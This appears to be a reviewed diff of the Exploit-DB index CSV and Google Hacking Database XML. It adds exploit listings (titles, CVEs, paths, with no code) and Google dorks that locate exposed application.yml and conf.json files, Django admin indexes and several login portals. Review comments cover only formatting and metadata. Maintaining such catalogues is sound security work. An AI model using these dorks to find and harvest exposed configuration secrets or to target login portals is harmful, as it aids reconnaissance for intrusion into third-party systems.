41939,exploits/php/webapps/41939.txt,"Revive Ad Server 4.0.1 - Cross-Site Scripting / Cross-Site Request Forgery",2017-04-26,"Cyril Vallicari",webapps,php,,2017-04-26,2017-04-26,0,,,,,http://www.exploit-db.comrevive-adserver-4.0.1.zip, 41939,exploits/php/webapps/41939.txt,"Revive Ad Server 4.0.1 - Cross-Site Scripting / Cross-Site Request Forgery",2017-04-26,"Cyril Vallicari",webapps,php,,2017-04-26,2017-04-26,0,,,,,http://www.exploit-db.comrevive-adserver-4.0.1.zip,
47739,exploits/php/webapps/47739.php,"Revive Adserver 4.2 - Remote Code Execution",2019-12-03,crlf,webapps,php,,2019-12-03,2019-12-03,0,CVE-2019-5434,,,,http://www.exploit-db.comrevive-adserver-4.2.0.tar.gz, 47739,exploits/php/webapps/47739.php,"Revive Adserver 4.2 - Remote Code Execution",2019-12-03,crlf,webapps,php,,2019-12-03,2019-12-03,0,CVE-2019-5434,,,,http://www.exploit-db.comrevive-adserver-4.2.0.tar.gz,
@ -33442,6 +33448,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
34432,exploits/php/webapps/34432.txt,"Wowd - 'index.html' Multiple Cross-Site Scripting Vulnerabilities",2009-10-29,Lostmon,webapps,php,,2009-10-29,2014-08-27,1,,,,,,https://www.securityfocus.com/bid/42327/info 34432,exploits/php/webapps/34432.txt,"Wowd - 'index.html' Multiple Cross-Site Scripting Vulnerabilities",2009-10-29,Lostmon,webapps,php,,2009-10-29,2014-08-27,1,,,,,,https://www.securityfocus.com/bid/42327/info
49657,exploits/php/webapps/49657.txt,"WoWonder Social Network Platform 3.1 - 'event_id' SQL Injection",2021-03-17,securityforeveryone.com,webapps,php,,2021-03-17,2021-03-17,0,,,,,, 49657,exploits/php/webapps/49657.txt,"WoWonder Social Network Platform 3.1 - 'event_id' SQL Injection",2021-03-17,securityforeveryone.com,webapps,php,,2021-03-17,2021-03-17,0,,,,,,
49989,exploits/php/webapps/49989.py,"WoWonder Social Network Platform 3.1 - Authentication Bypass",2021-06-11,securityforeveryone.com,webapps,php,,2021-06-11,2021-06-11,0,,,,,, 49989,exploits/php/webapps/49989.py,"WoWonder Social Network Platform 3.1 - Authentication Bypass",2021-06-11,securityforeveryone.com,webapps,php,,2021-06-11,2021-06-11,0,,,,,,
51122,exploits/php/webapps/51122.py,"WP All Import v3.6.7 - Remote Code Execution (RCE) (Authenticated)",2023-03-29,AkuCyberSec,webapps,php,,2023-03-29,2023-03-29,0,CVE-2022-1565,,,,,
47419,exploits/php/webapps/47419.txt,"WP Server Log Viewer 1.0 - 'logfile' Persistent Cross-Site Scripting",2019-09-25,strider,webapps,php,,2019-09-25,2019-09-25,0,,,,,, 47419,exploits/php/webapps/47419.txt,"WP Server Log Viewer 1.0 - 'logfile' Persistent Cross-Site Scripting",2019-09-25,strider,webapps,php,,2019-09-25,2019-09-25,0,,,,,,
39678,exploits/php/webapps/39678.txt,"WPN-XM Serverstack 0.8.6 - Cross-Site Request Forgery",2016-04-11,hyp3rlinx,webapps,php,80,2016-04-11,2016-04-11,0,,,,,,http://hyp3rlinx.altervista.org/advisories/WPNXM-CSRF.txt 39678,exploits/php/webapps/39678.txt,"WPN-XM Serverstack 0.8.6 - Cross-Site Request Forgery",2016-04-11,hyp3rlinx,webapps,php,80,2016-04-11,2016-04-11,0,,,,,,http://hyp3rlinx.altervista.org/advisories/WPNXM-CSRF.txt
51075,exploits/php/webapps/51075.txt,"WPN-XM Serverstack for Windows 0.8.6 - Multiple Vulnerabilities",2023-03-27,"Rafael Pedrero",webapps,php,,2023-03-27,2023-03-27,0,,,,,, 51075,exploits/php/webapps/51075.txt,"WPN-XM Serverstack for Windows 0.8.6 - Multiple Vulnerabilities",2023-03-27,"Rafael Pedrero",webapps,php,,2023-03-27,2023-03-27,0,,,,,,
@ -40589,6 +40596,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
15626,exploits/windows/local/15626.py,"OtsTurntables 1.00.048 - '.m3u'/'.ofl' Local Buffer Overflow (SEH)",2010-11-28,0v3r,local,windows,,2010-11-28,2010-11-28,1,,,,http://www.exploit-db.com/screenshots/idlt16000/screen-shot-2010-11-28-at-74353-am.png,http://www.exploit-db.comotsturntablesfreesetup.exe, 15626,exploits/windows/local/15626.py,"OtsTurntables 1.00.048 - '.m3u'/'.ofl' Local Buffer Overflow (SEH)",2010-11-28,0v3r,local,windows,,2010-11-28,2010-11-28,1,,,,http://www.exploit-db.com/screenshots/idlt16000/screen-shot-2010-11-28-at-74353-am.png,http://www.exploit-db.comotsturntablesfreesetup.exe,
11475,exploits/windows/local/11475.py,"OtsTurntables Free 1.00.047 - '.olf' Universal Buffer Overflow",2010-02-16,mr_me,local,windows,,2010-02-15,,1,,,,,http://www.exploit-db.comotsturntablesfreesetup.exe, 11475,exploits/windows/local/11475.py,"OtsTurntables Free 1.00.047 - '.olf' Universal Buffer Overflow",2010-02-16,mr_me,local,windows,,2010-02-15,,1,,,,,http://www.exploit-db.comotsturntablesfreesetup.exe,
48414,exploits/windows/local/48414.txt,"Outline Service 1.3.3 - 'Outline Service ' Unquoted Service Path",2020-05-04,"Minh Tuan",local,windows,,2020-05-04,2020-05-04,0,,,,,, 48414,exploits/windows/local/48414.txt,"Outline Service 1.3.3 - 'Outline Service ' Unquoted Service Path",2020-05-04,"Minh Tuan",local,windows,,2020-05-04,2020-05-04,0,,,,,,
51128,exploits/windows/local/51128.txt,"Outline V1.6.0 - Unquoted Service Path",2023-03-29,"Milad karimi",local,windows,,2023-03-29,2023-03-29,0,,,,,,
21096,exploits/windows/local/21096.txt,"Outlook Express 6 - Attachment Security Bypass",2001-08-30,http-equiv,local,windows,,2001-08-30,2012-09-10,1,OSVDB-11941,,,,,https://www.securityfocus.com/bid/3271/info 21096,exploits/windows/local/21096.txt,"Outlook Express 6 - Attachment Security Bypass",2001-08-30,http-equiv,local,windows,,2001-08-30,2012-09-10,1,OSVDB-11941,,,,,https://www.securityfocus.com/bid/3271/info
29465,exploits/windows/local/29465.txt,"Outpost Firewall PRO 4.0 - Local Privilege Escalation",2007-01-15,"Matousec Transparent security",local,windows,,2007-01-15,2013-11-12,1,CVE-2007-0333;OSVDB-33480,,,,http://www.exploit-db.comoutpost_firewall_pro_v4.0_build_1005.590.123.zip,https://www.securityfocus.com/bid/22069/info 29465,exploits/windows/local/29465.txt,"Outpost Firewall PRO 4.0 - Local Privilege Escalation",2007-01-15,"Matousec Transparent security",local,windows,,2007-01-15,2013-11-12,1,CVE-2007-0333;OSVDB-33480,,,,http://www.exploit-db.comoutpost_firewall_pro_v4.0_build_1005.590.123.zip,https://www.securityfocus.com/bid/22069/info
47658,exploits/windows/local/47658.txt,"oXygen XML Editor 21.1.1 - XML External Entity Injection",2019-11-14,"Pablo Santiago",local,windows,,2019-11-14,2019-11-14,0,,,,,, 47658,exploits/windows/local/47658.txt,"oXygen XML Editor 21.1.1 - XML External Entity Injection",2019-11-14,"Pablo Santiago",local,windows,,2019-11-14,2019-11-14,0,,,,,,
@ -42650,6 +42658,8 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
12244,exploits/windows/remote/12244.txt,"iMesh 7.1.0.x - 'IMWeb.dll 7.0.0.x' Remote Heap Overflow",2007-12-18,rgod,remote,windows,,2007-12-17,,1,CVE-2007-6493;OSVDB-40239,,,,, 12244,exploits/windows/remote/12244.txt,"iMesh 7.1.0.x - 'IMWeb.dll 7.0.0.x' Remote Heap Overflow",2007-12-18,rgod,remote,windows,,2007-12-17,,1,CVE-2007-6493;OSVDB-40239,,,,,
30939,exploits/windows/remote/30939.txt,"ImgSvr 0.6.21 - Error Message Remote Script Execution",2007-12-26,anonymous,remote,windows,,2007-12-26,2014-01-15,1,,,,,,https://www.securityfocus.com/bid/27033/info 30939,exploits/windows/remote/30939.txt,"ImgSvr 0.6.21 - Error Message Remote Script Execution",2007-12-26,anonymous,remote,windows,,2007-12-26,2014-01-15,1,,,,,,https://www.securityfocus.com/bid/27033/info
37611,exploits/windows/remote/37611.php,"Impero Education Pro - System Remote Command Execution",2015-07-14,slipstream,remote,windows,,2015-07-14,2015-07-14,0,OSVDB-124655;OSVDB-124654,,,,, 37611,exploits/windows/remote/37611.php,"Impero Education Pro - System Remote Command Execution",2015-07-14,slipstream,remote,windows,,2015-07-14,2015-07-14,0,OSVDB-124655;OSVDB-124654,,,,,
51127,exploits/windows/remote/51127.py,"Inbit Messenger v4.9.0 - Unauthenticated Remote Command Execution (RCE)",2023-03-29,a-rey,remote,windows,,2023-03-29,2023-03-29,0,,,,,,
51126,exploits/windows/remote/51126.py,"Inbit Messenger v4.9.0 - Unauthenticated Remote SEH Overflow",2023-03-29,a-rey,remote,windows,,2023-03-29,2023-03-29,0,,,,,,
8284,exploits/windows/remote/8284.pl,"IncrediMail 5.86 - Cross-Site Scripting Script Execution",2009-03-24,"Bui Quang Minh",remote,windows,,2009-03-23,,1,,,,,, 8284,exploits/windows/remote/8284.pl,"IncrediMail 5.86 - Cross-Site Scripting Script Execution",2009-03-24,"Bui Quang Minh",remote,windows,,2009-03-23,,1,,,,,,
3877,exploits/windows/remote/3877.html,"IncrediMail IMMenuShellExt - ActiveX Control Buffer Overflow",2007-05-08,"Umesh Wanve",remote,windows,,2007-05-07,,1,OSVDB-34331;CVE-2007-1683,,,,, 3877,exploits/windows/remote/3877.html,"IncrediMail IMMenuShellExt - ActiveX Control Buffer Overflow",2007-05-08,"Umesh Wanve",remote,windows,,2007-05-07,,1,OSVDB-34331;CVE-2007-1683,,,,,
28853,exploits/windows/remote/28853.html,"Indusoft Thin Client 7.1 - ActiveX Buffer Overflow",2013-10-10,blake,remote,windows,,2013-10-10,2013-10-10,0,OSVDB-98333,,,,, 28853,exploits/windows/remote/28853.html,"Indusoft Thin Client 7.1 - ActiveX Buffer Overflow",2013-10-10,blake,remote,windows,,2013-10-10,2013-10-10,0,OSVDB-98333,,,,,
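Review bot: the `port` column is empty for both Inbit Messenger rows (51126 and 51127) although 51127.py defaults to TCP/10883 (`--port ... default=10883`) and the file preceding it in this diff shows the same default; filling the column in keeps the index searchable by port, which is what defenders filter on when triaging exposed services.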
@ -42677,6 +42687,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
40984,exploits/windows/remote/40984.py,"Internet Download Accelerator 6.10.1.1527 - FTP Buffer Overflow (SEH)",2017-01-02,"Fady Mohammed Osman",remote,windows,,2017-01-02,2017-01-02,1,,,,http://www.exploit-db.com/screenshots/idlt41000/screen-shot-2017-01-02-at-165012.png,http://www.exploit-db.comidasetup.exe, 40984,exploits/windows/remote/40984.py,"Internet Download Accelerator 6.10.1.1527 - FTP Buffer Overflow (SEH)",2017-01-02,"Fady Mohammed Osman",remote,windows,,2017-01-02,2017-01-02,1,,,,http://www.exploit-db.com/screenshots/idlt41000/screen-shot-2017-01-02-at-165012.png,http://www.exploit-db.comidasetup.exe,
37668,exploits/windows/remote/37668.php,"Internet Download Manager - OLE Automation Array Remote Code Execution",2015-07-21,"Mohammad Reza Espargham",remote,windows,,2015-07-21,2015-07-21,0,CVE-2014-6332,,,,, 37668,exploits/windows/remote/37668.php,"Internet Download Manager - OLE Automation Array Remote Code Execution",2015-07-21,"Mohammad Reza Espargham",remote,windows,,2015-07-21,2015-07-21,0,CVE-2014-6332,,,,,
32465,exploits/windows/remote/32465.pl,"Internet Download Manager 4.0.5 - File Parsing Buffer Overflow",2008-10-06,Ciph3r,remote,windows,,2008-10-06,2014-03-24,1,CVE-2008-4508;OSVDB-49030,,,,,https://www.securityfocus.com/bid/31603/info 32465,exploits/windows/remote/32465.pl,"Internet Download Manager 4.0.5 - File Parsing Buffer Overflow",2008-10-06,Ciph3r,remote,windows,,2008-10-06,2014-03-24,1,CVE-2008-4508;OSVDB-49030,,,,,https://www.securityfocus.com/bid/31603/info
51131,exploits/windows/remote/51131.txt,"Internet Download Manager v6.41 Build 3 - Remote Code Execution (RCE)",2023-03-29,"M. Akil Gündoğan",remote,windows,,2023-03-29,2023-03-29,0,,,,,,
19922,exploits/windows/remote/19922.pl,"Internet Security Systems ICECap Manager 2.0.23 - Default Username and Password",2000-05-17,"rain forest puppy",remote,windows,,2000-05-17,2012-07-18,1,CVE-2000-0350;OSVDB-312,,,,,https://www.securityfocus.com/bid/1216/info 19922,exploits/windows/remote/19922.pl,"Internet Security Systems ICECap Manager 2.0.23 - Default Username and Password",2000-05-17,"rain forest puppy",remote,windows,,2000-05-17,2012-07-18,1,CVE-2000-0350;OSVDB-312,,,,,https://www.securityfocus.com/bid/1216/info
23847,exploits/windows/remote/23847.c,"Internet Security Systems Protocol Analysis Module ICQ - Parsing Buffer Overflow",2004-03-26,Sam,remote,windows,,2004-03-26,2013-01-03,1,,,,,,https://www.securityfocus.com/bid/9913/info 23847,exploits/windows/remote/23847.c,"Internet Security Systems Protocol Analysis Module ICQ - Parsing Buffer Overflow",2004-03-26,Sam,remote,windows,,2004-03-26,2013-01-03,1,,,,,,https://www.securityfocus.com/bid/9913/info
20934,exploits/windows/remote/20934.txt,"Internet Software Solutions Air Messenger LAN Server 3.4.2 - Full Path Disclosure",2001-06-18,"SNS Research",remote,windows,,2001-06-18,2012-08-30,1,CVE-2001-0788;OSVDB-13973,,,,,https://www.securityfocus.com/bid/2881/info 20934,exploits/windows/remote/20934.txt,"Internet Software Solutions Air Messenger LAN Server 3.4.2 - Full Path Disclosure",2001-06-18,"SNS Research",remote,windows,,2001-06-18,2012-08-30,1,CVE-2001-0788;OSVDB-13973,,,,,https://www.securityfocus.com/bid/2881/info
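Review bot: the added 51131 row leaves the codes and source-URL columns empty, so the new "Internet Download Manager v6.41 Build 3" entry carries no CVE, OSVDB or advisory reference; if one exists it should be recorded the way the adjacent 32465 row does (`CVE-2008-4508;OSVDB-49030` plus its securityfocus link), and the verified flag being 0 is consistent with an unverified submission. Unrelated to the change but visible in this hunk's context: row 40984's application URL `http://www.exploit-db.comidasetup.exe` is missing the `/` between host and path.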

ghdb.xml

@ -33946,6 +33946,21 @@ ManhNho
<date>2018-05-29</date> <date>2018-05-29</date>
<author>ManhNho</author> <author>ManhNho</author>
</entry> </entry>
<entry>
<id>8129</id>
<link>https://www.exploit-db.com/ghdb/8129</link>
<category>Files Containing Juicy Info</category>
<shortDescription>BroadBand Device Webserver</shortDescription>
<textualDescription># Google Dork: BroadBand Device Webserver
# Files Containing Juicy Info
# Date:29/03/2023
# Exploit Author: Shx</textualDescription>
<query>BroadBand Device Webserver</query>
<querystring>https://www.google.com/search?q=BroadBand Device Webserver</querystring>
<edb></edb>
<date>2023-03-29</date>
<author>Shx</author>
</entry>
<entry> <entry>
<id>4740</id> <id>4740</id>
<link>https://www.exploit-db.com/ghdb/4740</link> <link>https://www.exploit-db.com/ghdb/4740</link>
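Review bot: the `<querystring>` on the new 8129 entry contains unencoded spaces (`search?q=BroadBand Device Webserver`), which is not a valid URL; browsers repair it, but a strict parser will not, so the query should be percent-encoded (`q=BroadBand%20Device%20Webserver`). Two smaller points in the same entry: `# Date:29/03/2023` in `<textualDescription>` lacks the space after the colon and uses DD/MM/YYYY while `<date>` uses ISO 8601, and the query carries no operator (`intitle:`, `inurl:`), so it is a plain phrase search rather than a targeted dork.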
@ -40414,6 +40429,21 @@ Information about user data is obtained
<date>2021-11-12</date> <date>2021-11-12</date>
<author>Reza Abasi</author> <author>Reza Abasi</author>
</entry> </entry>
<entry>
<id>8131</id>
<link>https://www.exploit-db.com/ghdb/8131</link>
<category>Files Containing Juicy Info</category>
<shortDescription>intitle:&quot;index of &quot;application.yml&quot;</shortDescription>
<textualDescription># Google Dork: intitle:&quot;index of &quot;application.yml&quot;
# Files Containing Juicy Info
# Date:29/03/2023
# Exploit Author: Suman Das</textualDescription>
<query>intitle:&quot;index of &quot;application.yml&quot;</query>
<querystring>https://www.google.com/search?q=intitle:&quot;index of &quot;application.yml&quot;</querystring>
<edb></edb>
<date>2023-03-29</date>
<author>Suman Das</author>
</entry>
<entry> <entry>
<id>7959</id> <id>7959</id>
<link>https://www.exploit-db.com/ghdb/7959</link> <link>https://www.exploit-db.com/ghdb/7959</link>
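Review bot: the query on entry 8131, `intitle:"index of "application.yml"`, contains three double-quote characters, so one phrase is unterminated and it is ambiguous whether `application.yml` is meant to sit inside the `intitle:` phrase or stand alone; the quoting should be balanced before the entry is published, and the same string is copied into `<shortDescription>` and `<querystring>`, so all three fields need the fix. The `<querystring>` also embeds raw quotes and spaces that should be percent-encoded, and `# Date:29/03/2023` lacks the space after the colon.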
@ -40429,6 +40459,21 @@ Information about user data is obtained
<date>2022-06-29</date> <date>2022-06-29</date>
<author>Suman Das</author> <author>Suman Das</author>
</entry> </entry>
<entry>
<id>8128</id>
<link>https://www.exploit-db.com/ghdb/8128</link>
<category>Files Containing Juicy Info</category>
<shortDescription>intitle:&quot;index of &quot;conf.json&quot;</shortDescription>
<textualDescription># Google Dork: intitle:&quot;index of &quot;conf.json&quot;
# Files Containing Juicy Info
# Date:29/03/2023
# Exploit Author: Suman Das</textualDescription>
<query>intitle:&quot;index of &quot;conf.json&quot;</query>
<querystring>https://www.google.com/search?q=intitle:&quot;index of &quot;conf.json&quot;</querystring>
<edb></edb>
<date>2023-03-29</date>
<author>Suman Das</author>
</entry>
<entry> <entry>
<id>7947</id> <id>7947</id>
<link>https://www.exploit-db.com/ghdb/7947</link> <link>https://www.exploit-db.com/ghdb/7947</link>
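Review bot: entry 8128 has the same unbalanced quoting as the 8131 entry above it: `intitle:"index of "conf.json"` has three double quotes, so the phrase grouping is ambiguous and the string needs to be balanced in `<shortDescription>`, `<query>` and `<querystring>` alike. The `<querystring>` should additionally be percent-encoded rather than carrying raw `"` and spaces, and `# Date:29/03/2023` is missing the space after the colon.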
@ -47725,6 +47770,21 @@ Author: Abhinav Porwal
<date>2021-10-04</date> <date>2021-10-04</date>
<author>Asif Mohammad Khan</author> <author>Asif Mohammad Khan</author>
</entry> </entry>
<entry>
<id>8130</id>
<link>https://www.exploit-db.com/ghdb/8130</link>
<category>Files Containing Juicy Info</category>
<shortDescription>intitle:index of django/admin site:.*</shortDescription>
<textualDescription># Google Dork: intitle:index of django/admin site:.*
# Files Containing Juicy Info
# Date:29/03/2023
# Exploit Author: Md rofikul</textualDescription>
<query>intitle:index of django/admin site:.*</query>
<querystring>https://www.google.com/search?q=intitle:index of django/admin site:.*</querystring>
<edb></edb>
<date>2023-03-29</date>
<author>Md rofikul</author>
</entry>
<entry> <entry>
<id>7827</id> <id>7827</id>
<link>https://www.exploit-db.com/ghdb/7827</link> <link>https://www.exploit-db.com/ghdb/7827</link>
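Review bot: `site:.*` in entry 8130's query is not a valid value for the `site:` operator, which takes a domain or top-level domain, not a wildcard pattern, and in the unquoted `intitle:index of django/admin` the `intitle:` operator binds only to the word `index`; the clause should be dropped or corrected before the dork is stored, and since `<shortDescription>`, `<query>` and `<querystring>` all repeat the string, each needs the same edit. As with the other new entries, the `<querystring>` has unencoded spaces and `# Date:29/03/2023` lacks the space after the colon.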
@ -68039,6 +68099,21 @@ Author: Sibi Mathew George
<date>2021-10-25</date> <date>2021-10-25</date>
<author>César Hernández Obispo</author> <author>César Hernández Obispo</author>
</entry> </entry>
<entry>
<id>8125</id>
<link>https://www.exploit-db.com/ghdb/8125</link>
<category>Pages Containing Login Portals</category>
<shortDescription>allintitle:&quot;MobileIron User Portal: Sign In&quot;</shortDescription>
<textualDescription># Google Dork: allintitle:&quot;MobileIron User Portal: Sign In&quot;
# Pages Containing Login Portals
# Date:29/03/2023
# Exploit Author: Heverin Hacker</textualDescription>
<query>allintitle:&quot;MobileIron User Portal: Sign In&quot;</query>
<querystring>https://www.google.com/search?q=allintitle:&quot;MobileIron User Portal: Sign In&quot;</querystring>
<edb></edb>
<date>2023-03-29</date>
<author>Heverin Hacker</author>
</entry>
<entry> <entry>
<id>8092</id> <id>8092</id>
<link>https://www.exploit-db.com/ghdb/8092</link> <link>https://www.exploit-db.com/ghdb/8092</link>
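Review bot: the `<querystring>` for entry 8125 embeds raw `"` and spaces (`q=allintitle:"MobileIron User Portal: Sign In"`) and should be percent-encoded to form a valid URL; the same applies to the 8127 (ResolutionMD) and 8126 (Synapse Mobility) entries added further down in this file, which follow the identical pattern. `<edb>` is left empty, which is correct only if no Exploit-DB entry is tied to this dork, and `# Date:29/03/2023` lacks the space after the colon in all three entries.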
@ -68054,6 +68129,21 @@ Author: Sibi Mathew George
<date>2023-02-27</date> <date>2023-02-27</date>
<author>GirlsLearnCyber</author> <author>GirlsLearnCyber</author>
</entry> </entry>
<entry>
<id>8127</id>
<link>https://www.exploit-db.com/ghdb/8127</link>
<category>Pages Containing Login Portals</category>
<shortDescription>allintitle:&quot;ResolutionMD Login&quot;</shortDescription>
<textualDescription># Google Dork: allintitle:&quot;ResolutionMD Login&quot;
# Pages Containing Login Portals
# Date:29/03/2023
# Exploit Author: Heverin Hacker</textualDescription>
<query>allintitle:&quot;ResolutionMD Login&quot;</query>
<querystring>https://www.google.com/search?q=allintitle:&quot;ResolutionMD Login&quot;</querystring>
<edb></edb>
<date>2023-03-29</date>
<author>Heverin Hacker</author>
</entry>
<entry> <entry>
<id>8095</id> <id>8095</id>
<link>https://www.exploit-db.com/ghdb/8095</link> <link>https://www.exploit-db.com/ghdb/8095</link>
@ -68069,6 +68159,21 @@ Author: Sibi Mathew George
<date>2023-02-27</date> <date>2023-02-27</date>
<author>GirlsLearnCyber</author> <author>GirlsLearnCyber</author>
</entry> </entry>
<entry>
<id>8126</id>
<link>https://www.exploit-db.com/ghdb/8126</link>
<category>Pages Containing Login Portals</category>
<shortDescription>allintitle:&quot;Synapse Mobility Login&quot;</shortDescription>
<textualDescription># Google Dork: allintitle:&quot;Synapse Mobility Login&quot;
# Pages Containing Login Portals
# Date:29/03/2023
# Exploit Author: Heverin Hacker</textualDescription>
<query>allintitle:&quot;Synapse Mobility Login&quot;</query>
<querystring>https://www.google.com/search?q=allintitle:&quot;Synapse Mobility Login&quot;</querystring>
<edb></edb>
<date>2023-03-29</date>
<author>Heverin Hacker</author>
</entry>
<entry> <entry>
<id>8091</id> <id>8091</id>
<link>https://www.exploit-db.com/ghdb/8091</link> <link>https://www.exploit-db.com/ghdb/8091</link>